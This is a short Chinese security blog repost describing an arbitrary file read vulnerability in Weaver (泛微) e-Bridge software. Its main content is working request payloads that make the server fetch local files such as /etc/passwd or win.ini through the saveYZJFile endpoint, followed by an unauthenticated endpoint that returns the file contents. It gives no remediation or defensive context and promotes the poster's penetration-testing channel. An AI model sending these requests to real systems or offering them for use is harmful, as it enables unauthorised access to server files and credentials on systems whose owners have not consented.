泛微云桥任意文件读取

admin
admin
admin
103387
文章
87
评论
2020年9月13日09:00:50评论572 views字数 329阅读1分5秒阅读模式

点击蓝字 ·  关注我们

01

漏洞标题

微云桥任意文件读取


02

生成文件id


0x01 payload

Linux:

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt

Windows:

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C://windows/win.ini&fileExt=txt


03

获取文件内容

Payload:/file/fileNoLogin/{id值}


04

Linux复现


泛微云桥任意文件读取


泛微云桥任意文件读取


05

Windows复现


泛微云桥任意文件读取



关注EDI安全,获取更多HVV情报

EDI安全

泛微云桥任意文件读取

扫二维码|关注我们

一个专注渗透实战经验分享的公众号

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年9月13日09:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   泛微云桥任意文件读取https://cn-sec.com/archives/130669.html

发表评论

匿名网友 填写信息